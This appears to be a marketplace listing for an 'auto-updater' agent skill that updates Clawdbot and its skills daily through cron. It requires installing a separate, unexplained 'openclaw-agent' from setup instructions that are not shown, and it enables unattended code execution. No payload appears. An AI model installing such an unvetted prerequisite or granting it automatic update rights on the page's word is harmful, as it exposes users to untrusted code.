auto-updater
Automatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed.
Why use this skill?
Keep your OpenClaw agent running at peak performance. Auto-updater automatically manages daily updates for Clawdbot and all your installed skills via cron.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/auto-updater-hfmctWhat This Skill Does
The auto-updater skill is a vital utility for OpenClaw users who want to maintain a high-performing and secure agent environment with minimal manual intervention. By leveraging a scheduled cron job, this skill automates the otherwise tedious process of keeping your Clawdbot framework and individual installed skills at their latest versions. It performs a comprehensive update cycle: first checking for core system updates for Clawdbot, followed by scanning all registered skills via clawdhub to identify pending updates. Once the process completes, the skill generates a structured report, detailing which components were upgraded, version jumps, and which skills remain current. This ensures your agent is always running the latest patches, performance optimizations, and security fixes released by developers.
Installation
Installation requires the prior setup of the openclaw-agent utility. Without this agent, the system cannot perform the necessary file-system operations or cron scheduling required for background updates.
- Install the agent: Follow the OS-specific instructions for Windows or macOS provided in the core setup guide.
- Add the skill: Run
clawhub install openclaw/skills/skills/hightower6eu/auto-updater-hfmctin your terminal. - Initialize: Once installed, either use the quick-start prompt or manually define your cron schedule via
clawdbot cron addto specify your preferred update window.
Use Cases
- Production Environments: Ideal for users running long-term automation tasks who cannot afford broken integrations due to outdated skill versions.
- Maintenance Optimization: Perfect for developers or power users who manage dozens of skills and want to avoid checking for updates manually every morning.
- Version Consistency: Ensures that if a skill requires a specific core Clawdbot feature or dependency, the update process synchronizes these dependencies correctly using
clawdbot doctor.
Example Prompts
- "Set up daily auto-updates for yourself and all your skills."
- "Update all my skills now and let me know if there are any breaking changes in the latest versions."
- "Show me the status of my current skill versions and when the next auto-update is scheduled to run."
Tips & Limitations
- Prerequisite Reliance: The skill will fail silently if the openclaw-agent is not running. Verify the agent process status before troubleshooting update failures.
- Cron Scheduling: We recommend setting the update time to off-peak hours (e.g., 4:00 AM) to ensure the system is not actively executing intensive tasks when the update process begins.
- Manual Verification: Always run
clawdhub update --all --dry-runif you are concerned about potential breaking changes before allowing the automated process to commit to an update.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-auto-updater-hfmct": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: file-write, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.